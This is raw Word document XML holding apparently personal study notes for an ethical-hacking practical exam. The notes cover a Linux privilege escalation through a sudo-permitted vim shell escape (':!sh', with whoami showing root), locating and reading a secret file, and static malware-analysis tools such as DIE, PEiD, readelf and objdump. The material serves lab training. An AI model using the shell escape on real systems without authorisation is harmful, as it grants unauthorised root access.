        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7B31DF37">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;if </w:t>
      </w:r>
      <w:r w:rsidR="7B31DF37">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="7B31DF37">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim allowed then:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>press :</w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> then type :!</w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>or :</w:t>
      </w:r>
      <w:r w:rsidR="4A78B383">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>!bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20683F1C" w:rsidP="7D333612" w:rsidRDefault="20683F1C" w14:paraId="589B4229" w14:textId="3503A39A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="20683F1C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>----or--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="118A9AEB" w:rsidRDefault="118A9AEB" w14:paraId="480861D6" w14:textId="0A58DA5E">
      <w:r w:rsidR="118A9AEB">
        <w:drawing>
          <wp:inline wp14:editId="009E1DE1" wp14:anchorId="081CA882">
            <wp:extent cx="5943600" cy="4705352"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18265080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24cce597cfd4d0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4705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5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="06EB9FD8" w14:textId="08E50681">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:!whoami                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="65B62C5F" w14:textId="234760D0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>[No write since last change]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="4465B9D5" w14:textId="073903EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="265C27C7" w14:textId="2A074744">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;To get the </w:t>
      </w:r>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>filepath</w:t>
      </w:r>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -name secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="32965C63" w14:textId="50C40905">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; find / -name "test.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="36E1A57D" w14:textId="08BA88CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="290CCA1E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;Component of the file: cat givenfilePath (ex- home/cehprac/secret.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C5AA300" w:rsidP="5C5AA300" w:rsidRDefault="5C5AA300" w14:paraId="5C8644AE" w14:textId="38597C69">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="10847D99" w:rsidP="5C5AA300" w:rsidRDefault="10847D99" w14:paraId="2D5546A5" w14:textId="7D7613BD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version of Malware Sample:</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="436ABA5A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10847D99" w:rsidP="5C5AA300" w:rsidRDefault="10847D99" w14:paraId="78270EA8" w14:textId="4A13A9A2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; use </w:t>
      </w:r>
      <w:r w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:r w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>mal</w:t>
      </w:r>
      <w:r w:rsidR="10847D99">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="450E93BF" w:rsidP="5C5AA300" w:rsidRDefault="450E93BF" w14:paraId="1C722C3F" w14:textId="7EB6E717">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="450E93BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; DIE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="57D8D4BB" w:rsidP="5C5AA300" w:rsidRDefault="57D8D4BB" w14:paraId="421127BB" w14:textId="2B822F05">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="57D8D4BB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="57D8D4BB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>entryPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="57D8D4BB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630601CC" w:rsidP="5C5AA300" w:rsidRDefault="630601CC" w14:paraId="6A2C36EB" w14:textId="257F56D5">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="630601CC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="630601CC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PEiD</w:t>
      </w:r>
      <w:r w:rsidR="630601CC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="630601CC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GB"/>
        </w:rPr>
        <w:t>Malware analysis tool\static analysis\packaging and obfuscation folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630601CC" w:rsidP="5C5AA300" w:rsidRDefault="630601CC" w14:paraId="6BD1A7AB" w14:textId="0C581452">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="630601CC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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="69FCF3FB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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">or use </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="69FCF3FB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GB"/>
        </w:rPr>
        <w:t>DetectitEasy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5612478A" w:rsidP="5C5AA300" w:rsidRDefault="5612478A" w14:paraId="4123FAD3" w14:textId="4C2CA42E">
      <w:pPr>
        <w:pStyle w:val="Normal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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="5612478A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GB"/>
        </w:rPr>
        <w:t>Malware Header:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="31163449" w:rsidP="40100644" w:rsidRDefault="31163449" w14:paraId="3C98A68B" w14:textId="16F0DF30">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="31163449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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; First memory segment loaded by the OS loader (usually </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="31163449">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.text</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="31163449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section</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="0B9C82A5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0100644" w:rsidR="0B9C82A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="0B9C82A5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elf</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="31163449">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5612478A" w:rsidP="5C5AA300" w:rsidRDefault="5612478A" w14:paraId="2BBC7B00" w14:textId="5A5CF2AF">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="5612478A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GB"/>
        </w:rPr>
        <w:t>-&gt; open DIE and load the executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="396998E0" w:rsidP="5C5AA300" w:rsidRDefault="396998E0" w14:paraId="3904758A" w14:textId="73281689">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="396998E0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GB"/>
        </w:rPr>
        <w:t>-&gt; switch to elf tab to see program headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5612478A" w:rsidP="5C5AA300" w:rsidRDefault="5612478A" w14:paraId="4241CD71" w14:textId="6A4AC469">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="5612478A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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="25E70528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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="25E70528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GB"/>
        </w:rPr>
        <w:t>exif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3914B8BB" w:rsidP="40100644" w:rsidRDefault="3914B8BB" w14:paraId="19FF4827" w14:textId="3F239330">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rb359dade531f470a">
        <w:r w:rsidRPr="40100644" w:rsidR="3914B8BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://intezer.com/blog/elf-malware-analysis-101-initial-analysis/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="40100644" w:rsidR="3914B8BB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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71CF809E" w:rsidP="40100644" w:rsidRDefault="71CF809E" w14:paraId="00C16F59" w14:textId="0355E146">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="71CF809E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GB"/>
        </w:rPr>
        <w:t>readelf</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="71CF809E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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l hello      # for PT_LOAD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71CF809E" w:rsidP="40100644" w:rsidRDefault="71CF809E" w14:paraId="2C99AB18" w14:textId="647535EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="71CF809E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GB"/>
        </w:rPr>
        <w:t>readelf -h hello      # for entry point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71CF809E" w:rsidP="40100644" w:rsidRDefault="71CF809E" w14:paraId="0D5C0206" w14:textId="30665072">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="71CF809E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GB"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="71CF809E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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d hello      # to disassemble</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="683DAACE" w:rsidRDefault="683DAACE" w14:paraId="63AFEA93" w14:textId="59406CF1">
      <w:r w:rsidR="683DAACE">
        <w:drawing>
          <wp:inline wp14:editId="33D08231" wp14:anchorId="2E734D0B">
            <wp:extent cx="5943600" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14638527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1c942cc9ffc453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60CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="32AEBE86" w14:textId="79BFF8E8">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>Or,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="21BA5182" w14:textId="699B6FD7">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; Copy file from window to </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>Administrator@192.168.X.X:"C:\Users\Admin\Documents\Strange_File-1</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>" ~/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="41F2A349" w14:textId="623844D6">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>-&gt; file Strange_File-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="735A53D3" w14:textId="7C0EBF56">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">If elf-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>readelf</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>, die</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="355BD23E" w14:textId="218ABDDF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PE32+ executable</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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→ use </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Detect It Easy</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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, </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Cutter</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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, or </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pefile.p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="38839364" w14:textId="0E93DA0B">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>-&gt; readelf -l Strange_File-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6060CD23" w:rsidP="40100644" w:rsidRDefault="6060CD23" w14:paraId="646F1863" w14:textId="7D7022B2">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="6060CD23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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="0CCA8816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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> objdump -p Strange_File-1 | grep "PT_LOAD [0]"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0CCA8816" w:rsidP="40100644" w:rsidRDefault="0CCA8816" w14:paraId="53258420" w14:textId="29ACFBFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="0CCA8816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GB"/>
        </w:rPr>
        <w:t>The output should show information about PT_LOAD(0), including the 'p_filesz'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="4DFF8254" w14:textId="228D2F27">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="5A555D6F" w14:textId="7CE174E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6FD7E552" w:rsidRDefault="6FD7E552" w14:paraId="41EAF892" w14:textId="2F108FEC">
      <w:r w:rsidR="6FD7E552">
        <w:drawing>
          <wp:inline wp14:editId="3AC3156D" wp14:anchorId="0809B58D">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19553648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918a1469fa94a6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269240" w:rsidRDefault="19269240" w14:paraId="4206D28F" w14:textId="1EDA9A98">
      <w:r w:rsidR="19269240">
        <w:drawing>
          <wp:inline wp14:editId="65314F5D" wp14:anchorId="29727DDC">
            <wp:extent cx="5086350" cy="3284934"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18764137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9e530bce8104a9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086350" cy="3284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100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="5BAB3508" w14:textId="49FA54F2">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="61BD505D" w14:textId="75C0587E">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="63B51039" w:rsidRDefault="63B51039" w14:paraId="10FEC7F1" w14:textId="73ECF66B">
      <w:r w:rsidR="63B51039">
        <w:drawing>
          <wp:inline wp14:editId="5C157033" wp14:anchorId="60F2BCFB">
            <wp:extent cx="5943600" cy="4486275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1863473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66dbb22b12c4b2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B51039" w:rsidP="40100644" w:rsidRDefault="63B51039" w14:paraId="1B72B4A8" w14:textId="07A56A6F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63B51039">
        <w:drawing>
          <wp:inline wp14:editId="34332076" wp14:anchorId="3F8C870A">
            <wp:extent cx="5943600" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14558904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fdbec5ba19741e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0100644" w:rsidR="63B5103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We look for the first substring that matches the given reg </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="63B51039">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ex( ex</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="63B5103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 </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="63B51039">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NNNaNNaa)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40100644" w:rsidP="40100644" w:rsidRDefault="40100644" w14:paraId="69AA067A" w14:textId="03B24FA8">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
